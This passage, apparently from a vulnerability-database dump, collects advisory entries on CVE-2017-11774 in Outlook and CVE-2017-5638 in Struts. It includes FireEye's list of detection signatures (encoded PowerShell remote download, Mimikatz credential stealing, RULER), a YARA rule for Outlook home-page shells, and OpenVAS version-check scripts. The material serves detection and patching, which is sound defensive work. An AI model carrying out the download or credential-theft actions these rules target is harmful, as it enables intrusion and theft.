365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost\u2019s RULER.\n\n**Microsoft Outlook Security Update**\n\n| \n\n**RULER Module Addressed** \n \n---|--- \n \n[June 13, 2017 Security Update](<https://support.microsoft.com/en-us/help/3191938/descriptionofthesecurityupdateforoutlook2013june13-2017>)\n\n| \n\n[RULER.RULES](<https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/>) \n \n[September 12, 2017 Security Update](<https://support.microsoft.com/en-us/help/4011091/descriptionofthesecurityupdateforoutlook2016september12-2017>)\n\n| \n\n[RULER.FORMS](<https://sensepost.com/blog/2017/outlook-forms-and-shells/>) \n \n[October 10, 2017 Security Update](<https://support.microsoft.com/en-us/help/4011162/description-of-the-security-update-for-outlook-2016-october-10-2017>)\n\n| \n\n[RULER.HOMEPAGE](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>) \n \nTable 3: Outlook attack surface mitigations\n\n#### Detecting the Techniques\n\nFireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.****\n\n**PLATFORM**\n\n| \n\n**SIGNATURE NAME** \n \n---|--- \n \nEndpoint Security\n\n| \n\nPOWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY) \nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY) \nMIMIKATZ (CREDENTIAL STEALER) \nRULER OUTLOOK PERSISTENCE (UTILITY) \n \nNetwork and Email Security\n\n| \n\nFE_Exploit_HTML_CVE201711774 \nFE_HackTool_Win_RULER \nFE_HackTool_Linux_RULER \nFE_HackTool_OSX_RULER \nFE_Trojan_OLE_RULER \nHackTool.RULER (Network Traffic) \n \nTable 4: FireEye product detections\n\nFor organizations interested in hunting for Outlook home page shell and persistence, we\u2019ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:\n\nrule Hunting_Outlook_Homepage_Shell_and_Persistence \n{ \nmeta: \nauthor = \"Nick Carr (@itsreallynick)\" \nreference_hash = \"506fe019d48ff23fac8ae3b6dd754f6e\" \nstrings: \n$script_1 = \"<htm\" ascii nocase wide \n$script_2 = \"<script\" ascii nocase wide \n$viewctl1_a = \"ViewCtl1\" ascii nocase wide \n$viewctl1_b = \"0006F063-0000-0000-C000-000000000046\" ascii wide \n$viewctl1_c = \".OutlookApplication\" ascii nocase wide \ncondition: \nuint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*) \n}\n\n#### Acknowledgements\n\nThe authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-21T14:00:00", "type": "fireeye", "title": "OVERRULED: Containing a Potentially Destructive Adversary", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774", "CVE-2017-0213"], "modified": "2018-12-21T14:00:00", "id": "FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B", "href": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "symantec": [{"lastseen": "2021-06-08T19:04:45", "description": "### Description\n\nMicrosoft Office Outlook is prone to a security-bypass vulnerability because it fails to properly handle input. An attacker can leverage this issue to bypass certain security restrictions and execute arbitrary commands in the context of the affected application; this may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Outlook 2010 (32-bit editions) Service Pack 2 \n * Microsoft Outlook 2010 (64-bit editions) Service Pack 2 \n * Microsoft Outlook 2013 RT Service Pack 1 \n * Microsoft Outlook 2013 Service Pack 1 (32-bit editions) \n * Microsoft Outlook 2013 Service Pack 1 (64-bit editions) \n * Microsoft Outlook 2016 (32-bit editions) \n * Microsoft Outlook 2016 (64-bit editions) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo mitigate the impact of a successful exploit, run the affected application as a user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nNever accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploit attempts of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-10-10T00:00:00", "type": "symantec", "title": "Microsoft Office Outlook CVE-2017-11774 Security Bypass Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11774"], "modified": "2017-10-10T00:00:00", "id": "SMNTC-101098", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101098", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "mscve": [{"lastseen": "2023-09-22T01:16:53", "description": "A security feature bypass vulnerability exists when Microsoft Outlook improperly handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary commands.\n\nIn a file-sharing attack scenario, an attacker could provide a specially crafted document file designed to exploit the vulnerability, and then convince users to open the document file and interact with the document.\n\nThe security update addresses the vulnerability by correcting how Microsoft Outlook handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-10T07:00:00", "type": "mscve", "title": "Microsoft Outlook Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2017-10-10T07:00:00", "id": "MS:CVE-2017-11774", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11774", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2019-07-14T23:37:47", "description": "Last week on Malwarebytes Labs, we explained [what to do when you find stalkerware](<https://blog.malwarebytes.com/stalkerware/2019/07/helping-survivors-of-domestic-abuse-what-to-do-when-you-find-stalkerware/>), how [cooperating apps and automatic permissions are setting you up for failure](<https://blog.malwarebytes.com/awareness/2019/07/cooperating-apps-and-automatic-permissions-are-setting-you-up-for-failure/>), and why you should [steer clear of Bitcoin Cash generators](<https://blog.malwarebytes.com/crypto/2019/07/steer-clear-of-bitcoin-cash-generators/>).\n\n### Other cybersecurity news:\n\n * A former Chief Information Officer (CIO) of [Equifax](<https://www.zdnet.com/article/former-equifax-executive-sent-behind-bars-for-insider-trading-after-data-breach/>) has been issued a prison sentence for insider trading on the firm's disastrous data breach before the incident became public knowledge. (Source: ZDNet)\n * A new [Ryuk](<https://www.darkreading.com/document.asp?doc_id=1335101>) ransomware campaign is spreading globally, according to a warning issued by the UK's National Cyber Security Centre (NCSC). (Source: DarkReading)\n * [Orvibo](<https://www.vpnmentor.com/blog/report-orvibo-leak/>) smart home devices leaked billions of user records including logs that contained everything from** **usernames, email addresses, and passwords, to precise locations. (Source: VPNMentor)\n * [Chinese authorities](<http://www.iphonehacks.com/2019/07/china-border-surveillance-install-spyware.html>) have decided to spy on foreigners crossing the border by installing spyware on Android phones. (Source: iPhoneHacks)\n * [Germany](<https://www.zdnet.com/article/germany-to-publish-standard-on-modern-secure-browsers/>)'s cybersecurity agency is working on a set of minimum rules that modern web browsers must comply with in order to be considered secure. (Source: ZDNet)\n * An ongoing attack in the [OpenPGP](<https://duo.com/decipher/openpgp-certificate-attack-worries-experts>) community makes users' certificates unusable and can essentially break the OpenPGP implementation of anyone who tries to import one of the certificates. (Source: Duo Security)\n * Dubbed [Godlua](<https://www.techspot.com/news/80791-meet-godlua-first-known-malware-leverages-dns-over.html>), researchers have discovered the first known malware strain that uses the DNS over HTTPS protocol. (Source: TechSpot)\n * [IronPython](<http://blog.ptsecurity.com/2019/07/ironpython-darkly-how-we-uncovered.html>), darkly: how researchers uncovered an attack on government entities in Europe. (Source: PT Security)\n * [Attunity](<https://www.bleepingcomputer.com/news/security/netflix-ford-td-bank-data-exposed-by-open-amazon-s3-buckets/>), a company that is currently working with at least half of all Fortune 100 companies, including Netflix, leaked both its clients' and its own data. (Source: BleepingComputer)\n * The [US Cyber Command](<https://www.theregister.co.uk/2019/07/03/outlook_flaw_iran/>) has issued an alert that hackers have been actively going after CVE-2017-11774. The flaw is a sandbox escape bug in Outlook. (Source: The Register)\n\nStay safe, everyone!\n\nThe post [A week in security (July 1 \u2013 7)](<https://blog.malwarebytes.com/a-week-in-security/2019/07/a-week-in-security-july-1-7/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-07-08T15:08:33", "type": "malwarebytes", "title": "A week in security (July 1 \u2013 7)", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2019-07-08T15:08:33", "id": "MALWAREBYTES:E65F857AAAC912ABF5A439E335A3376B", "href": "https://blog.malwarebytes.com/a-week-in-security/2019/07/a-week-in-security-july-1-7/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-09-14T17:30:57", "description": "### [updates 9/14/2017]\n\nEquifax has released information and confirmed the vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) that was used in this breach after several days of intense scrutiny around Apache Struts. To make matters worse, there already was a patch available for this flaw in March 2017, two months prior to the incident.\n\n_**1) Updated information on U.S. website application vulnerability.**_ \n_Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement._\n\n### [updates 9/12/2017]\n\nEquifax's efforts in response to this incident can be followed at www.equifaxsecurity2017.com, but the[ site has been called](<https://krebsonsecurity.com/2017/09/equifax-breach-response-turns-dumpster-fire/>) \"completely broken at best, and little more than a stalling tactic or sham at worst.\" And [ isn\u2019t working for many people](<https://www.businessinsider.nl/equifax-data-breach-site-check-angry-response-2017-9/>). So, we leave it up to your best judgment whether you should pay that site a visit .\n\nOver 30 lawsuits have been filed against Equifax following the breach [according to Reuters](<http://www.reuters.com/article/us-equifax-cyber-lawsuits/lawsuits-against-equifax-pile-up-after-massive-data-breach-idUSKCN1BM2E3>).\n\n[Quartz reported](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) that the vulnerability they mentioned was in a popular open-source software package called Apache Struts, which is a programming framework for building web applications in Java. Two vulnerabilities in Struts have been discovered so far in 2017. The vulnerability announced on Sept. 4 has existed in Struts since 2008.\n\nApache responded to that report with [this Apache Struts Statement on Equifax Security Breach](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>).\n\n \n\nOn July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax's overall security posture.\n\n[According to Equifax](<https://www.equifaxsecurity2017.com/frequently-asked-questions/>), online criminals maintained their presence from mid-May through July 2017 and had access to:\n\n * Names\n * Social Security numbers\n * Birth dates\n * Addresses\n * Driver\u2019s license numbers (in some cases)\n * Credit card numbers (for approx. 209,000 U.S. consumers)\n\nIt also said that some personal information for certain UK and Canadian residents was part of this breach.\n\nThis is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.\n\nEquifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. More information about this breach and how to apply for ID theft protection can be found by going to [equifaxsecurity2017.com](<https://www.equifaxsecurity2017.com/>), a website Equifax has just set up.\n\nThe post [Equifax breach: What you need to know [updated]](<https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-08T07:02:47", "title": "Equifax breach: What you need to know [updated]", "type": "malwarebytes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-09-08T07:02:47", "id": "MALWAREBYTES:4993027161793E66024E0B42522BB53D", "href": "https://blog.malwarebytes.com/cybercrime/2017/09/equifax-breach-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-06-08T23:35:34", "description": "This host is missing an important security\n update according to Microsoft KB4011196", "cvss3": {}, "published": "2017-10-11T00:00:00", "type": "openvas", "title": "Microsoft Outlook 2010 Service Pack 2 Security Feature Bypass Vulnerability (KB4011196)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11774"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812024", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812024", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Outlook 2010 Service Pack 2 Security Feature Bypass Vulnerability (KB4011196)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812024\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11774\");\n script_bugtraq_id(101098);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 10:08:54 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Outlook 2010 Service Pack 2 Security Feature Bypass Vulnerability (KB4011196)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4011196\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error when Microsoft\n Outlook improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability to execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Outlook 2010 Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4011196\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/Office/Outlook/Version\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\noutlookVer = get_kb_item(\"SMB/Office/Outlook/Version\");\n\nif(!outlookVer || outlookVer !~ \"^14\\.\"){\n exit(0);\n}\n\noutlookFile = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\App Paths\\OUTLOOK.EXE\", item:\"Path\");\nif(!outlookFile){\n exit(0);\n}\n\noutlookVer = fetch_file_version(sysPath:outlookFile, file_name:\"outlook.exe\");\nif(!outlookVer){\n exit(0);\n}\n\nif(version_in_range(version:outlookVer, test_version:\"14.0\", test_version2:\"14.0.7189.4999\"))\n{\n report = 'File checked: ' + outlookFile + \"outlook.exe\" + '\\n' +\n 'File version: ' + outlookVer + '\\n' +\n 'Vulnerable range: 14.0 - 14.0.7189.4999'+ '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-08T23:35:34", "description": "This host is missing an important security\n update according to Microsoft KB4011178", "cvss3": {}, "published": "2017-10-11T00:00:00", "type": "openvas", "title": "Microsoft Outlook 2013 Service Pack 1 Security Feature Bypass Vulnerability (KB4011178)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11774"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812028", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Outlook 2013 Service Pack 1 Security Feature Bypass Vulnerability (KB4011178)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812028\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11774\");\n script_bugtraq_id(101098);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 11:13:49 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Outlook 2013 Service Pack 1 Security Feature Bypass Vulnerability (KB4011178)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4011178\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error when Microsoft\n Outlook improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability to execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Outlook 2013 Service Pack 1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4011178\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/Office/Outlook/Version\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\noutlookVer = get_kb_item(\"SMB/Office/Outlook/Version\");\nif(!outlookVer || outlookVer !~ \"^15\\.\"){\n exit(0);\n}\n\noutlookFile = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\App Paths\\OUTLOOK.EXE\", item:\"Path\");\nif(!outlookFile){\n exit(0);\n}\n\noutlookVer = fetch_file_version(sysPath:outlookFile, file_name:\"outlook.exe\");\nif(!outlookVer){\n exit(0);\n}\n\nif(version_in_range(version:outlookVer, test_version:\"15.0\", test_version2:\"15.0.4971.0999\"))\n{\n report = 'File checked: ' + outlookFile + \"outlook.exe\" + '\\n' +\n 'File version: ' + outlookVer + '\\n' +\n 'Vulnerable range: 15.0 - 15.0.4971.0999'+ '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:55", "description": "Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106652", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106652", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Bamboo Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106652\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Bamboo Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_mandatory_keys(\"AtlassianBamboo/Installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Bamboo uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Bamboo 5.1 until 5.14.4, 5.15.0 until 5.15.2.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.14.5, 5.15.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/BAM-18242\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"5.1.0\", test_version2: \"5.14.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.14.5\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"5.15.0\", test_version2: \"5.15.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.15.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "description": "Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability 